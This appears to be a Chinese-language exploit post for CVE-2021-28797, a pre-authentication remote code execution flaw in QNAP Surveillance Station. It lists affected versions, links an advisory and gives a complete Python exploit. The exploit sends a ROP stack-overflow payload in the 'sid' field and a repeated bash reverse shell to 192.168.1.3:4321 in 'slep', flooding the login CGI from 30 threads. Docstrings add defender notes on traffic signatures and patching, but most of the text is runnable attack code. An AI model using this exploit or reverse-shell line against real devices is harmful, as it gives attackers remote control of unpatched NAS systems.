
QNAP QTS Surveillance Station插件远程代码执行漏洞(CVE-2021-28797)

威联通监控管理系统Surveillance Station插件远程代码执行漏洞(CVE-2021-28797)

受影响版本：

  • QNAP QTS 5.1.5.4.2
  • QNAP QTS 5.1.5.3.2

漏洞分析见:https://ssd-disclosure.com/ssd-advisory-qnap-pre-auth-cgi_find_parameter-rce/

Exploit.py:

import requests
import threading
from struct import *
def p(x):
    """Pack ``x`` as a 4-byte little-endian unsigned integer (``struct`` format ``<L``)."""
    return pack("<L", x)
def run(session, data):
    """Post ``data`` 5000 times over ``session`` to the hard-coded target.

    Used as a thread body by ``main``. The responses are gathered into a
    local list that is never read, so nothing is returned or inspected.
    The target host (192.168.1.2:8080) is a fixed lab address, not a
    parameter; on the receiving side this shows up as a burst of identical
    POSTs to ``/cgi-bin/surveillance/apis/user.cgi`` from one client.
    """
    res = [session.post("http://192.168.1.2:8080/cgi-bin/surveillance/apis/user.cgi", data) for i in range(5000)]
def main() -> None:
    """Build the CVE-2021-28797 proof-of-concept request and fan it out over 30 threads.

    Notes for defenders (everything below is visible in this block):
    - The request is a ``login`` call to
      ``/cgi-bin/surveillance/apis/user.cgi`` whose ``sid`` field is a
      binary blob of over 3 KB instead of a session id, and whose ``slep``
      field is well over a megabyte. A length check on those two fields for
      this endpoint separates this traffic from real logins.
    - Thirty threads each send the same request 5000 times (see ``run``),
      so the traffic signature is a sustained flood of login POSTs to this
      CGI from a single source.
    - The callback address embedded in ``slep`` (192.168.1.3:4321) is a
      hard-coded lab value; outbound connections from the NAS to an
      unexpected host/port are the post-compromise indicator.
    - Mitigation is the vendor fix for CVE-2021-28797 on the affected
      Surveillance Station versions listed above.
    """
    with requests.Session() as s:
                # Overflow filler followed by the addresses annotated inline.
                payload = "A" * 3108
                payload += p(0x74a8eb8c) # pop {r0, r4, pc}
                payload += p(0x71154e28) # heap address
                payload += "BBBB"
                payload += p(0x74a636c4 + 1) # system

                # Form fields: only "act" carries a normal value; "sid" and
                # "slep" are the oversized parameters described above.
                data = {
            "act" : "login",
            "sid" : payload,
            "slep" : "bash -i >& /dev/tcp/192.168.1.3/4321 0>&1;" * 0x5000 + "\x00" + "bash -i >& /dev/tcp/192.168.1.3/4321 0>&1;" * 0x5000,
                }
                # Threads are started but never joined; the session is shared
                # across all of them.
                for i in range(30):
                    t = threading.Thread(target=run, args=(s, data))
                    t.start()


# Script entry point: nothing above runs on import, only when executed directly.
if __name__ == '__main__':
    main()